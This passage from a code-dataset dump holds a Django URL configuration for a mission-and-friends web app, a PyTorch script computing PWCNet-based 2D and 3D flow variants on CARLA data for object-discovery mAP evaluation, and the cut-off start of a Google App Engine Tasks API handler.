Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n# from clone.Final_Project.main_project.backend.views import friend_page\n# from Final_Project.main_project.backend.views import friend_page\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.generic import TemplateView\nimport backend.views as backend\nfrom django.contrib.auth import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n \n # path(\n # 'serviceworker.js',\n # TemplateView.as_view(template_name='serviceworker.js', content_type='application/javascript'),\n # name='serviceworker.js',\n # ),\n\n path('', TemplateView.as_view(template_name=\"start.html\")),\n path('', include('pwa.urls')),\n path('start', backend.start_page),\n path('login', backend.login_page),\n # path('accounts/login/', views.LoginView.as_view(template_name='login.html'), name='login'),\n\n path('register', backend.register_page),\n path('main', backend.main_page),\n path('mission', backend.mission_page),\n path('chatroom', backend.chatroom_page),\n path('manager', backend.manager_page),\n path('profile', backend.profile_page),\n path('friend', backend.friend_page),\n path('shop',backend.shop_page),\n path('aboutus', backend.aboutus_page),\n\n path('register_submit', backend.register_submit),\n path('login_check', backend.login_check),\n path('logout', backend.logout),\n\n path('get_all_mission', backend.get_all_mission),\n path('get_img', backend.get_img),\n path('get_img_count', backend.get_img_count),\n path('get_mission_group', backend.get_mission_group),\n path('join_mission_group', backend.join_mission_group),\n path('create_mission_group', backend.create_mission_group),\n path('get_mission_chatroom_list', backend.get_mission_chatroom_list),\n path('check_chatroom', backend.check_chatroom),\n path('mission_chatroom_update', backend.mission_chatroom_update),\n path('get_mission_chatroom_member', backend.get_mission_chatroom_member),\n path('kick_mission_chatroom_member', backend.kick_mission_chatroom_member),\n path('exit_mission_chatroom', backend.exit_mission_chatroom),\n \n path('submit_mission_group_check', backend.submit_mission_group_check),\n path('submit_mission_group', backend.submit_mission_group),\n path('upload_profile_photo', backend.upload_profile_photo),\n\n\n path('friend_chatroom_update', backend.friend_chatroom_update),\n path('save_profile_intro', backend.save_profile_intro),\n path('get_all_shop', backend.get_all_shop),\n path('buy_product', backend.buy_product),\n path('get_my_shop', backend.get_my_shop),\n path('use_product', backend.use_product),\n path('get_friend_group', backend.get_friend_group),\n path('get_friend_invitation', backend.get_friend_invitation),\n path('search_friend_ID', backend.search_friend_ID),\n path('is_friend', backend.is_friend),\n path('get_relationship', backend.get_relationship),\n \n path('send_invitation', backend.send_invitation),\n path('accept_invitation', backend.accept_invitation),\n path('reject_invitation', backend.reject_invitation),\n path('cancel_invitation', backend.cancel_invitation),\n path('delete_friend', backend.delete_friend),\n path('get_card', backend.get_card),\n path('get_friend_chatroom', backend.get_friend_chatroom),\n\n path('submission_to_finish', backend.submission_to_finish),\n \n \n # \n path('get_my_mission' , backend.get_my_mission),\n path('is_shared' , backend.is_shared),\n path('share' , backend.share),\n path('share_cancel' , backend.share_cancel),\n path('get_profile_page' , 
backend.get_profile_page),\n path('get_main_page' , backend.get_main_page),\n path('get_friend_page', backend.get_friend_page),\n path('get_shop_page', backend.get_shop_page),\n # \n # path('chat_update', backend.chat_update),\n\n \n\n\n]\n","sub_path":"main_project/main_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"274784914","text":"import torch\nimport torch.nn as nn\nimport hyperparams as hyp\nimport numpy as np\nimport time\n\nfrom model_base import Model\n# from nets.featnet import FeatNet\n# from nets.occnet import OccNet\n# from nets.flownet import FlowNet\n# from nets.viewnet import ViewNet\n# from nets.embnet2D import EmbNet2D\n# from nets.embnet3D import EmbNet3D\nfrom nets.pwcnet import PWCNet\n\nimport torch.nn.functional as F\n\nfrom utils_basic import *\nimport utils_vox\nimport utils_samp\nimport utils_geom\nimport utils_misc\nimport utils_improc\nimport utils_basic\nimport utils_eval\n\nfrom tensorboardX import SummaryWriter\nfrom backend import saverloader, inputs\nfrom torchvision import datasets, transforms\n\nnp.set_printoptions(precision=2)\nnp.random.seed(0)\nMAX_QUEUE = 10 # how many items before the summaryWriter flushes\n\nclass CARLA_PWC(Model):\n def initialize_model(self):\n print(\"------ INITIALIZING MODEL OBJECTS ------\")\n self.model = CarlaPWCNet().to(self.device)\n\n def go(self):\n self.start_time = time.time()\n self.initialize_model()\n print(\"------ Done creating models ------\")\n if hyp.lr > 0:\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=hyp.lr)\n self.start_iter = saverloader.load_weights(self.model, self.optimizer)\n print(\"------ Done loading weights ------\")\n else:\n self.start_iter = 0\n\n if hyp.do_save_outputs:\n out_dir = 'outs/%s' % (hyp.name)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n set_nums = []\n set_names = []\n set_inputs = []\n set_writers = []\n set_log_freqs = []\n set_do_backprops = []\n set_dicts = []\n set_loaders = []\n\n for set_name in hyp.set_names:\n if hyp.sets_to_run[set_name]:\n set_nums.append(hyp.set_nums[set_name])\n set_names.append(set_name)\n set_inputs.append(self.all_inputs[set_name])\n set_writers.append(SummaryWriter(self.log_dir + '/' + set_name, max_queue=MAX_QUEUE, flush_secs=60))\n set_log_freqs.append(hyp.log_freqs[set_name])\n set_do_backprops.append(hyp.sets_to_backprop[set_name])\n set_dicts.append({})\n set_loaders.append(iter(set_inputs[-1]))\n\n if hyp.do_eval_map:\n all_maps_v0 = []\n all_maps_v1 = []\n all_maps_v2 = []\n all_maps_v3 = []\n all_maps_v4 = []\n all_maps_v5 = []\n \n actual_step = 0\n for step in list(range(self.start_iter+1, hyp.max_iters+1)):\n for i, (set_input) in enumerate(set_inputs):\n if step % len(set_input) == 0: #restart after one epoch. 
Note this does nothing for the tfrecord loader\n                    set_loaders[i] = iter(set_input)\n\n            for (set_num,\n                 set_name,\n                 set_input,\n                 set_writer,\n                 set_log_freq,\n                 set_do_backprop,\n                 set_dict,\n                 set_loader\n            ) in zip(\n                set_nums,\n                set_names,\n                set_inputs,\n                set_writers,\n                set_log_freqs,\n                set_do_backprops,\n                set_dicts,\n                set_loaders\n            ):\n\n                log_this = np.mod(step, set_log_freq)==0\n                total_time, read_time, iter_time = 0.0, 0.0, 0.0\n\n                if log_this or set_do_backprop or hyp.do_save_outputs:\n\n                    read_start_time = time.time()\n\n                    feed = next(set_loader)\n                    feed_cuda = {}\n                    for k in feed:\n                        try:\n                            feed_cuda[k] = feed[k].cuda(non_blocking=True)\n                        except Exception:\n                            # some things are not tensors (e.g., filename)\n                            feed_cuda[k] = feed[k]\n\n                    # feed_cuda = next(iter(set_input))\n                    read_time = time.time() - read_start_time\n\n                    feed_cuda['writer'] = set_writer\n                    feed_cuda['global_step'] = step\n                    feed_cuda['set_num'] = set_num\n                    feed_cuda['set_name'] = set_name\n\n                    filename = feed_cuda['filename'][0]\n                    # print('filename = %s' % filename)\n                    tokens = filename.split('/')\n                    filename = tokens[-1]\n                    # print('new filename = %s' % filename)\n\n                    iter_start_time = time.time()\n                    if set_do_backprop:\n                        self.model.train()\n                        loss, results, returned_early = self.model(feed_cuda)\n                    else:\n                        self.model.eval()\n                        with torch.no_grad():\n                            loss, results, returned_early = self.model(feed_cuda)\n                    loss_vis = loss.cpu().item()\n\n                    # if hyp.do_save_outputs:\n                    #     out_fn = '%s/%s_flow_memRs.npy' % (out_dir, filename)\n                    #     flow_memRs = results['flow_memRs'][0]\n                    #     flow_memRs = flow_memRs.detach().cpu()\n                    #     np.save(out_fn, flow_memRs)\n                    #     print('saved %s' % out_fn)\n                    #     print(flow_memRs.shape)\n\n                    if hyp.do_eval_map and (not returned_early):\n                        # the six per-variant blocks here were identical; collapse them into one loop\n                        all_maps_lists = [all_maps_v0, all_maps_v1, all_maps_v2,\n                                          all_maps_v3, all_maps_v4, all_maps_v5]\n                        for vi, all_maps in enumerate(all_maps_lists):\n                            all_maps.append(results['maps_v%d' % vi])\n                            mean_maps = np.mean(np.stack(all_maps, axis=0), axis=0)\n                            print('all_maps_v%d_:' % vi, mean_maps)\n\n                    if (not returned_early) and (set_do_backprop) and (hyp.lr > 0):\n                        loss.backward()\n                        self.optimizer.step()\n                        self.optimizer.zero_grad()\n                    iter_time = time.time()-iter_start_time\n                    total_time = time.time()-self.start_time\n\n                    print(\"%s; [%4d/%4d]; ttime: %.0f (%.2f, %.2f); loss: %.3f (%s)\" % (hyp.name,\n                                                                                        step,\n                                                                                        hyp.max_iters,\n                                                                                        total_time,\n                                                                                        read_time,\n                                                                                        iter_time,\n                                                                                        loss_vis,\n                                                                                        set_name))\n\n            if np.mod(step, hyp.snap_freq) == 0 and hyp.lr > 0:\n                saverloader.save(self.model, self.checkpoint_dir, step, self.optimizer)\n\n        for writer in set_writers: # close writers to flush cache into file\n            writer.close()\n\n\nclass CarlaPWCNet(nn.Module):\n    def 
__init__(self):\n super(CarlaPWCNet, self).__init__()\n self.pwcnet = PWCNet()\n\n # torch.set_default_tensor_type('torch.cuda.FloatTensor')\n torch.autograd.set_detect_anomaly(True)\n \n self.include_image_summs = hyp.do_include_summs\n\n def forward(self, feed):\n results = dict()\n summ_writer = utils_improc.Summ_writer(writer=feed['writer'],\n global_step=feed['global_step'],\n set_name=feed['set_name'],\n fps=8)\n \n writer = feed['writer']\n global_step = feed['global_step']\n\n total_loss = torch.tensor(0.0).cuda()\n\n __p = lambda x: pack_seqdim(x, B)\n __u = lambda x: unpack_seqdim(x, B)\n\n B, H, W, V, S, N = hyp.B, hyp.H, hyp.W, hyp.V, hyp.S, hyp.N\n PH, PW = hyp.PH, hyp.PW\n K = hyp.K\n Z, Y, X = hyp.Z, hyp.Y, hyp.X\n Z2, Y2, X2 = int(Z/2), int(Y/2), int(X/2)\n D = 9\n\n rgb_camRs = feed[\"rgb_camRs\"]\n rgb_camXs = feed[\"rgb_camXs\"]\n pix_T_cams = feed[\"pix_T_cams\"]\n cam_T_velos = feed[\"cam_T_velos\"]\n \n if (not hyp.flow_do_synth_rt) or feed['set_name']=='val':\n boxlist_camRs = feed[\"boxes3D\"]\n tidlist_s = feed[\"tids\"] # coordinate-less and plural\n scorelist_s = feed[\"scores\"] # coordinate-less and plural\n # # postproc the boxes:\n # scorelist_s = __u(utils_misc.rescore_boxlist_with_inbound(__p(boxlist_camRs), __p(tidlist_s), Z, Y, X))\n\n boxlist_camRs_, tidlist_s_, scorelist_s_ = __p(boxlist_camRs), __p(tidlist_s), __p(scorelist_s)\n boxlist_camRs_, tidlist_s_, scorelist_s_ = utils_misc.shuffle_valid_and_sink_invalid_boxes(\n boxlist_camRs_, tidlist_s_, scorelist_s_)\n boxlist_camRs = __u(boxlist_camRs_)\n tidlist_s = __u(tidlist_s_)\n scorelist_s = __u(scorelist_s_)\n\n origin_T_camRs = feed[\"origin_T_camRs\"]\n origin_T_camRs_ = __p(origin_T_camRs)\n origin_T_camXs = feed[\"origin_T_camXs\"]\n origin_T_camXs_ = __p(origin_T_camXs)\n\n camX0_T_camXs = utils_geom.get_camM_T_camXs(origin_T_camXs, ind=0)\n camX0_T_camXs_ = __p(camX0_T_camXs)\n camRs_T_camXs_ = torch.matmul(origin_T_camRs_.inverse(), origin_T_camXs_)\n camXs_T_camRs_ = camRs_T_camXs_.inverse()\n camRs_T_camXs = __u(camRs_T_camXs_)\n camXs_T_camRs = __u(camXs_T_camRs_)\n\n xyz_veloXs = feed[\"xyz_veloXs\"]\n xyz_camXs = __u(utils_geom.apply_4x4(__p(cam_T_velos), __p(xyz_veloXs)))\n xyz_camRs = __u(utils_geom.apply_4x4(__p(camRs_T_camXs), __p(xyz_camXs)))\n xyz_camX0s = __u(utils_geom.apply_4x4(__p(camX0_T_camXs), __p(xyz_camXs)))\n\n # occXs = __u(utils_vox.voxelize_xyz(__p(xyz_camXs), Z, Y, X))\n occX0s = __u(utils_vox.voxelize_xyz(__p(xyz_camX0s), Z, Y, X))\n # occXs_half = __u(utils_vox.voxelize_xyz(__p(xyz_camXs), Z2, Y2, X2))\n occX0s_half = __u(utils_vox.voxelize_xyz(__p(xyz_camX0s), Z2, Y2, X2))\n\n unpXs = __u(utils_vox.unproject_rgb_to_mem(\n __p(rgb_camXs), Z, Y, X, __p(pix_T_cams)))\n unpX0s = utils_vox.apply_4x4s_to_voxs(camX0_T_camXs, unpXs)\n unpXs_half = __u(utils_vox.unproject_rgb_to_mem(\n __p(rgb_camXs), Z2, Y2, X2, __p(pix_T_cams)))\n unpX0s_half = utils_vox.apply_4x4s_to_voxs(camX0_T_camXs, unpXs_half)\n\n ## projected depth, and inbound mask\n depth_camXs_, valid_camXs_ = utils_geom.create_depth_image(__p(pix_T_cams), __p(xyz_camXs), H, W)\n dense_xyz_camXs_ = utils_geom.depth2pointcloud(depth_camXs_, __p(pix_T_cams))\n dense_xyz_camRs_ = utils_geom.apply_4x4(__p(camRs_T_camXs), dense_xyz_camXs_)\n inbound_camXs_ = utils_vox.get_inbounds(dense_xyz_camRs_, Z, Y, X).float()\n inbound_camXs_ = torch.reshape(inbound_camXs_, [B*S, 1, H, W])\n inbound_camXs = __u(inbound_camXs_)\n depth_camXs = __u(depth_camXs_)\n valid_camXs = __u(valid_camXs_) * __u(inbound_camXs_)\n\n\n\n 
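# also build depth/valid images from the camX0 (geometrically-stabilized) pointclouds; the v5 flow variant below backwarps depth_camX0s[:,1]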
depth_camX0s_, valid_camX0s_ = utils_geom.create_depth_image(__p(pix_T_cams), __p(xyz_camX0s), H, W)\n depth_camX0s = __u(depth_camX0s_)\n \n\n #####################\n ## visualize what we got\n #####################\n summ_writer.summ_oneds('2D_inputs/depth_camXs', torch.unbind(depth_camXs, dim=1))\n summ_writer.summ_oneds('2D_inputs/valid_camXs', torch.unbind(valid_camXs, dim=1))\n summ_writer.summ_rgbs('2D_inputs/rgb_camRs', torch.unbind(rgb_camRs, dim=1))\n summ_writer.summ_rgbs('2D_inputs/rgb_camXs', torch.unbind(rgb_camXs, dim=1))\n # summ_writer.summ_occs('3D_inputs/occXs', torch.unbind(occXs, dim=1))\n summ_writer.summ_occs('3D_inputs/occX0s', torch.unbind(occX0s, dim=1))\n # summ_writer.summ_unps('3D_inputs/unpXs', torch.unbind(unpXs, dim=1), torch.unbind(occXs, dim=1))\n summ_writer.summ_unps('3D_inputs/unpX0s', torch.unbind(unpX0s, dim=1), torch.unbind(occX0s, dim=1))\n\n\n if (not hyp.flow_do_synth_rt) or feed['set_name']=='val':\n lrtlist_camRs = __u(utils_geom.convert_boxlist_to_lrtlist(boxlist_camRs_)).reshape(B, S, N, 19)\n lrtlist_camXs = __u(utils_geom.apply_4x4_to_lrtlist(__p(camXs_T_camRs), __p(lrtlist_camRs)))\n # stabilize boxes for ego/cam motion\n lrtlist_camX0s = __u(utils_geom.apply_4x4_to_lrtlist(__p(camX0_T_camXs), __p(lrtlist_camXs)))\n # these are is B x S x N x 19\n\n summ_writer.summ_lrtlist('lrtlist_camR0', rgb_camRs[:,0], lrtlist_camRs[:,0],\n scorelist_s[:,0], tidlist_s[:,0], pix_T_cams[:,0])\n summ_writer.summ_lrtlist('lrtlist_camR1', rgb_camRs[:,1], lrtlist_camRs[:,1],\n scorelist_s[:,1], tidlist_s[:,1], pix_T_cams[:,1])\n summ_writer.summ_lrtlist('lrtlist_camX0', rgb_camXs[:,0], lrtlist_camXs[:,0],\n scorelist_s[:,0], tidlist_s[:,0], pix_T_cams[:,0])\n summ_writer.summ_lrtlist('lrtlist_camX1', rgb_camXs[:,1], lrtlist_camXs[:,1],\n scorelist_s[:,1], tidlist_s[:,1], pix_T_cams[:,1])\n (obj_lrtlist_camXs,\n obj_scorelist_s,\n ) = utils_misc.collect_object_info(lrtlist_camXs,\n tidlist_s,\n scorelist_s,\n pix_T_cams, \n K, mod='X',\n do_vis=True,\n summ_writer=summ_writer)\n (obj_lrtlist_camRs,\n obj_scorelist_s,\n ) = utils_misc.collect_object_info(lrtlist_camRs,\n tidlist_s,\n scorelist_s,\n pix_T_cams, \n K, mod='R',\n do_vis=True,\n summ_writer=summ_writer)\n (obj_lrtlist_camX0s,\n obj_scorelist_s,\n ) = utils_misc.collect_object_info(lrtlist_camX0s,\n tidlist_s,\n scorelist_s,\n pix_T_cams, \n K, mod='X0',\n do_vis=False)\n\n masklist_memR = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camRs[:,0], scorelist_s[:,0], Z, Y, X, coeff=1.0)\n masklist_memX = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camXs[:,0], scorelist_s[:,0], Z, Y, X, coeff=1.0)\n # obj_mask_memR is B x N x 1 x Z x Y x X\n summ_writer.summ_occ('obj/masklist_memR', torch.sum(masklist_memR, dim=1))\n summ_writer.summ_occ('obj/masklist_memX', torch.sum(masklist_memX, dim=1))\n\n # flow_pwc = self.pwcnet(rgb_camRs[:, 0] + 0.5, rgb_camRs[:, 1] + 0.5) # only 1/255 normalization in pwcnet \n # summ_writer.summ_flow('flow/flow_pwc', flow_pwc)\n\n # compute flow from X0 to X1\n # (to be fair with our own models, we use inputs in X coordinates)\n pwcflow_camX0 = self.pwcnet(rgb_camXs[:, 0] + 0.5, rgb_camXs[:, 1] + 0.5) # only 1/255 normalization in pwcnet \n summ_writer.summ_flow('flow/pwcflow_camX0', pwcflow_camX0)\n\n \n camX0_T_camX1 = camX0_T_camXs[:,1]\n camX1_T_camX0 = utils_geom.safe_inverse(camX0_T_camX1)\n depth_camX0 = depth_camXs[:,0]\n egoflow_camX0 = utils_geom.depthrt2flow(depth_camX0, camX1_T_camX0, pix_T_cams[:,0])\n summ_writer.summ_flow('flow/egoflow_camX0', 
egoflow_camX0)\n rgb_camX1_egostab = utils_samp.backwarp_using_2D_flow(rgb_camXs[:,1], egoflow_camX0)\n valid_camX1_egostab = utils_samp.backwarp_using_2D_flow(torch.ones_like(rgb_camXs[:,1,0:1]), egoflow_camX0)\n valid_camX1_flowstab = utils_samp.backwarp_using_2D_flow(torch.ones_like(rgb_camXs[:,1,0:1]), pwcflow_camX0)\n egostab_rgbX0 = rgb_camXs[:,0]*valid_camX1_egostab\n egostab_rgbX1 = rgb_camX1_egostab*valid_camX1_egostab\n summ_writer.summ_rgbs('flow/rgb_stab', [egostab_rgbX0, egostab_rgbX1])\n\n # compute stabflow from X0 to X1\n stabpwcflow_camX0 = self.pwcnet(egostab_rgbX0 + 0.5, egostab_rgbX1 + 0.5) # only 1/255 normalization in pwcnet \n summ_writer.summ_flow('flow/stabpwcflow_camX0', stabpwcflow_camX0*inbound_camXs[:,0])\n\n # prep occR0, which we will use to mask the 3D flows\n occR0 = utils_vox.voxelize_xyz(xyz_camRs[:,0], Z2, Y2, X2)\n \n # v0: 2D flow estimated from real frames, minus egoflow, unprojected\n v0flow_camX0 = pwcflow_camX0 - egoflow_camX0\n summ_writer.summ_flow('flow/v0flow_camX0', v0flow_camX0*inbound_camXs[:,0])\n v0flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v0flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v0flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v0flow_memX0)\n v0flow_memR0 = torch.cat([v0flow_memR0, torch.ones_like(v0flow_memR0[:,0:1])], dim=1)\n v0flow_memR0 = v0flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v0flow_memR0', v0flow_memR0, clip=0.0)\n\n # v1: 2D flow estimated from ego-stabilized frames, unprojected\n v1flow_memX0 = utils_vox.unproject_rgb_to_mem(\n stabpwcflow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v1flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v1flow_memX0)\n v1flow_memR0 = torch.cat([v1flow_memR0, torch.ones_like(v1flow_memR0[:,0:1])], dim=1)\n v1flow_memR0 = v1flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v1flow_memR0', v1flow_memR0, clip=0.0)\n\n # v2: 3D flow estimated by backwarping depth1, unprojected\n depth_camX1_flowstab = utils_samp.backwarp_using_2D_flow(depth_camXs[:,1], pwcflow_camX0)\n xyz0 = utils_geom.depth2pointcloud(depth_camXs[:,0], pix_T_cams[:,0])\n xyz1 = utils_geom.depth2pointcloud(depth_camX1_flowstab, pix_T_cams[:,0])\n v2flow_camX0 = xyz1-xyz0\n v2flow_camX0 = v2flow_camX0.reshape([B, H, W, 3]).permute(0, 3, 1, 2)*valid_camX1_flowstab\n summ_writer.summ_flow('flow/v2flow_camX0', v2flow_camX0[:,:2]*inbound_camXs[:,0])\n v2flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v2flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v2flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v2flow_memX0)\n v2flow_memR0 = v2flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v2flow_memR0', v2flow_memR0, clip=0.0)\n\n # v3: 3D flow estimated by backwarping the ego-stabilized pointcloud\n depth_camX1_egostab = utils_samp.backwarp_using_2D_flow(depth_camXs[:,1], egoflow_camX0)\n depth_camX1_egostab_and_flowstab = utils_samp.backwarp_using_2D_flow(depth_camX1_egostab, stabpwcflow_camX0)\n xyz0 = utils_geom.depth2pointcloud(depth_camXs[:,0], pix_T_cams[:,0])\n xyz1 = utils_geom.depth2pointcloud(depth_camX1_egostab_and_flowstab, pix_T_cams[:,0])\n v3flow_camX0 = xyz1-xyz0\n v3flow_camX0 = v3flow_camX0.reshape([B, H, W, 3]).permute(0, 3, 1, 2)*valid_camX1_egostab\n summ_writer.summ_flow('flow/v3flow_camX0_2chan', v3flow_camX0[:,:2]*inbound_camXs[:,0])\n v3flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v3flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v3flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v3flow_memX0)\n v3flow_memR0 = v3flow_memR0 * occR0\n 
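# log the occupancy-masked v3 scene flow in memR0 coordinates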
summ_writer.summ_3D_flow('flow/v3flow_memR0', v3flow_memR0, clip=0.0)\n\n\n # v4: 2D flow estimated from real frames, unprojected\n v4flow_camX0 = pwcflow_camX0\n summ_writer.summ_flow('flow/v4flow_camX0', v4flow_camX0*inbound_camXs[:,0])\n v4flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v4flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v4flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v4flow_memX0)\n v4flow_memR0 = torch.cat([v4flow_memR0, torch.ones_like(v4flow_memR0[:,0:1])], dim=1)\n v4flow_memR0 = v4flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v4flow_memR0', v4flow_memR0, clip=0.0)\n\n\n # v5: 3D flow estimated by backwarping the geometrically-stabilized pointcloud\n depth_camX1_egostab_and_flowstab = utils_samp.backwarp_using_2D_flow(depth_camX0s[:,1], stabpwcflow_camX0)\n xyz0 = utils_geom.depth2pointcloud(depth_camXs[:,0], pix_T_cams[:,0])\n xyz1 = utils_geom.depth2pointcloud(depth_camX1_egostab_and_flowstab, pix_T_cams[:,0])\n v5flow_camX0 = xyz1-xyz0\n v5flow_camX0 = v5flow_camX0.reshape([B, H, W, 3]).permute(0, 3, 1, 2)*valid_camX1_egostab\n summ_writer.summ_flow('flow/v5flow_camX0_2chan', v5flow_camX0[:,:2]*inbound_camXs[:,0])\n v5flow_memX0 = utils_vox.unproject_rgb_to_mem(\n v5flow_camX0, Z2, Y2, X2, pix_T_cams[:,0])\n v5flow_memR0 = utils_vox.apply_4x4_to_vox(camRs_T_camXs[:,0], v5flow_memX0)\n v5flow_memR0 = v5flow_memR0 * occR0\n summ_writer.summ_3D_flow('flow/v5flow_memR0', v5flow_memR0, clip=0.0)\n \n\n if hyp.do_eval_map:\n maps_v0 = self.discover(v0flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v1 = self.discover(v1flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v2 = self.discover(v2flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v3 = self.discover(v3flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v4 = self.discover(v4flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n maps_v5 = self.discover(v5flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n results['maps_v0'] = maps_v0\n results['maps_v1'] = maps_v1\n results['maps_v2'] = maps_v2\n results['maps_v3'] = maps_v3\n results['maps_v4'] = maps_v4\n results['maps_v5'] = maps_v5\n else:\n maps_v0 = self.discover(v0flow_memR0, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer)\n \n return total_loss, results, False\n\n \n def discover(self, flow, K, occR0, camXs_T_camRs, rgb_camRs, rgb_camXs, boxlist_camRs, scorelist_s, pix_T_cams, B, Z2, Y2, X2, summ_writer):\n flow_mag = torch.norm(flow, dim=1)\n # this is B x Z2 x Y2 x X2\n occ_flow_mag = flow_mag * occR0[:,0]\n\n # get K boxes\n det_image, boxlist_memR, scorelist, tidlist, connlist = utils_misc.get_boxes_from_flow_mag(occ_flow_mag, K)\n # boxlist_memR is B x K x 9\n boxlist_camR = utils_vox.convert_boxlist_memR_to_camR(boxlist_memR, Z2, Y2, X2)\n lrtlist_camR = utils_geom.convert_boxlist_to_lrtlist(boxlist_camR)\n\n masklist_1 = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camR, scorelist, Z2, Y2, X2, coeff=0.8)\n masklist_2 = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camR, scorelist, Z2, 
Y2, X2, coeff=1.2)\n masklist_3 = utils_vox.assemble_padded_obj_masklist(\n lrtlist_camR, scorelist, Z2, Y2, X2, coeff=1.8)\n # these are B x K x 1 x Z2 x Y2 x X2\n\n # use_center_surround = False\n use_center_surround = True\n\n if use_center_surround:\n # the idea of a center-surround feature is:\n # there should be stuff in the center but not in the surround\n # so, i need the density of the center\n # and the density of the surround\n # then, the score is center minus surround\n center_mask = (masklist_1).squeeze(2)\n surround_mask = (masklist_3-masklist_2).squeeze(2)\n # these are B x K x Z x Y x X\n\n # it could be that this scoring would work better with estimated occs,\n # since they are thicker\n\n weights = torch.ones(1, 1, 3, 3, 3, device=torch.device('cuda'))\n occ = F.conv3d(occR0, weights, padding=1)\n occ = torch.clamp(occ, 0, 1)\n occ = occ.squeeze(1)\n\n if self.include_image_summs:\n summ_writer.summ_3D_flow('flow/occ_flow', occ.unsqueeze(1)*flow)\n summ_writer.summ_rgb('obj/det_image', det_image)\n summ_writer.summ_lrtlist('obj/det_boxlist', rgb_camRs[:,0], lrtlist_camR,\n scorelist, tidlist, pix_T_cams[:,0])\n \n occ_flow_mag = flow_mag * occ\n occ_flow_mag_ = occ_flow_mag.unsqueeze(1).repeat(1, K, 1, 1, 1)\n center_ = utils_basic.reduce_masked_mean(occ_flow_mag_, center_mask, dim=[2,3,4])\n surround_ = utils_basic.reduce_masked_mean(occ_flow_mag_, surround_mask, dim=[2,3,4])\n\n scorelist = center_ - surround_\n # scorelist is B x K, with arbitrary range\n scorelist = torch.clamp(torch.sigmoid(scorelist), min=1e-4)\n # scorelist is B x K, in the range [0,1]\n\n if self.include_image_summs:\n summ_writer.summ_lrtlist('obj/scored_boxlist', rgb_camRs[:,0], lrtlist_camR,\n scorelist, tidlist, pix_T_cams[:,0])\n lrtlist_camX = utils_geom.apply_4x4_to_lrtlist(camXs_T_camRs[:,0], lrtlist_camR)\n summ_writer.summ_lrtlist('obj/scored_boxlistX', rgb_camXs[:,0], lrtlist_camX,\n scorelist, tidlist, pix_T_cams[:,0])\n\n boxlist_e = boxlist_camR.detach().cpu().numpy()\n boxlist_g = boxlist_camRs[:,0].detach().cpu().numpy()\n scorelist_e = scorelist.detach().cpu().numpy()\n scorelist_g = scorelist_s[:,0].detach().cpu().numpy()\n\n assert(B==1)\n boxlist_e, boxlist_g, scorelist_e, _ = utils_eval.drop_invalid_boxes(\n boxlist_e, boxlist_g, scorelist_e, scorelist_g)\n\n ious = np.linspace(0.1, 0.9, 9)\n maps = utils_eval.get_mAP(boxlist_e, scorelist_e, boxlist_g, ious)\n return maps\n\n","sub_path":"pytorch_disco_recovery/model_carla_pwc.py","file_name":"model_carla_pwc.py","file_ext":"py","file_size_in_byte":28745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56135254","text":"import os\nimport logging\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nfrom apiclient.discovery import build\nimport httplib2\nfrom oauth2client.appengine import OAuth2Decorator\nimport settings\nfrom django.utils import simplejson\n\ndecorator = OAuth2Decorator(client_id=settings.CLIENT_ID,\n client_secret=settings.CLIENT_SECRET,\n scope=settings.SCOPE,\n user_agent='karya')\n\nclass Task(object):\n def __init__(self, task_dict):\n self.name = task_dict['title']\n self.is_done = True if task_dict['status'] == 'completed' else False\n \n def __dict__(self):\n return {'name':self.name, 'isDone': self.is_done}\n \nclass MainHandler(webapp.RequestHandler):\n\n @decorator.oauth_required\n def get(self):\n if decorator.has_credentials():\n service = build('tasks', 'v1', 